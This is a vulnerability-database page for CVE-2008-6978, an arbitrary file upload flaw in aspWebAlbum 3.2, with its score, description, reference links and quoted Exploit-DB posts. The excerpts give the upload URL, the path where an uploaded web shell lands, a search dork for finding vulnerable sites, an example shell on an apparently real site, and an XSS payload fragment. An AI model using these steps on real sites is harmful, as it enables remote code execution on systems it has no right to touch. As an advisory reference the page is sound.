CVE-2008-6978
Published 2009-08-19
Priority: P3 · 50 · medium · CVSS 2.0: 6.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 4.29% (89.9th percentile)
Unrestricted file upload vulnerability in Full Revolution aspWebAlbum 3.2 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in pics/, related to the uploadmedia action in album.asp.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fullrevolution | aspwebalbum | — | — |
No detection rules found.
Exploit-DB
aspwebalbum 3.2 - Multiple Vulnerabilities
exploitdb·2008-09-10
---
#################################################################################################
#
#-# Discovered by Alemin_Krali #
#
#-# aspWebAlbum 3.2 #
#
#-# Script Download "http://www.fullrevolution.com" #
#
#-# aspWebAlbum 3.2 Single Site License | $60.00 : ) #
#
#-# HomePage al3m.blogspot.com #
#
#-# [email protected] #
#
#-# Dork ? : album.asp?pic= .jpg cat= #
#
#
#
#--# 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] #
#
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! #
#
and your shell address: #
#
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp #
#
#
ex:1 #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp #
#
ex:2
Exploit-DB
aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting
exploitdb·2008-09-03
---
##################################################################################################
#
#-# Discovered by Alemin_Krali alert('xss')&from=login #
#
#################################################################################################
# milw0rm.com [2008-09-03]
No writeups or analysis indexed.
http://osvdb.org/47913
http://secunia.com/advisories/31649
http://www.securityfocus.com/bid/30996
https://exchange.xforce.ibmcloud.com/vulnerabilities/44876
https://www.exploit-db.com/exploits/6357
https://www.exploit-db.com/exploits/6420
Published: 2009-08-19